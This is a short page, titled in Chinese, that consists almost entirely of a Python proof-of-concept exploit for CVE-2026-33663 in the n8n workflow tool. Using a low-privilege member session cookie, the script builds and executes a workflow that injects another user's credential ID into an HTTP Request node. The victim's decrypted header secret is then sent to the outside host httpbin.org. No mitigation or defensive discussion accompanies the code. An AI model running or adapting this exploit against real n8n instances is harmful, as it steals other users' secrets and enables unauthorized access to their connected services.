CVE-2026-33663 n8n凭据窃取漏洞

import requests # Target n8n instance TARGET_URL = "http://localhost:5678" # Attacker session with 'global:member' role ATTACKER_SESSION = "attacker_session_cookie" # The ID of the credential owned by another user (Victim) STOLEN_CRED_ID = "TARGET_CREDENTIAL_ID" # 1. Define a workflow payload that uses the stolen credential workflow_payload = { "name": "Exploit_CVE_2026_33663", "nodes": [ { "parameters": { "url": "http://httpbin.org/post", "authentication": "genericCredentialType", "genericAuthType": "httpHeaderAuth", "nodeCredentialType": "httpHeaderAuth", # Injecting the credential ID we want to steal "credentialId": STOLEN_CRED_ID }, "name": "HTTP Request Node", "type": "n8n-nodes-base.httpRequest", "typeVersion": 4.1, "position": [250, 300] } ], "connections": {} } headers = {"Cookie": f"session={ATTACKER_SESSION}"} # 2. Create the workflow create_resp = requests.post(f"{TARGET_URL}/rest/workflows", json=workflow_payload, headers=headers) workflow_id = create_resp.json().get("id") if create_resp.status_code == 200: print(f"[+] Workflow created with ID: {workflow_id}") # 3. Execute the workflow # The vulnerability allows bypassing the ownership check for 'httpHeaderAuth' # during execution, effectively decrypting and using the victim's secret. exec_resp = requests.post(f"{TARGET_URL}/rest/workflows/{workflow_id}/execute", headers=headers) if exec_resp.status_code == 200: print("[+] Workflow executed successfully using stolen credential.") print(f"[+] Response data: {exec_resp.text}") else: print("[-] Execution failed.") else: print("[-] Workflow creation failed.")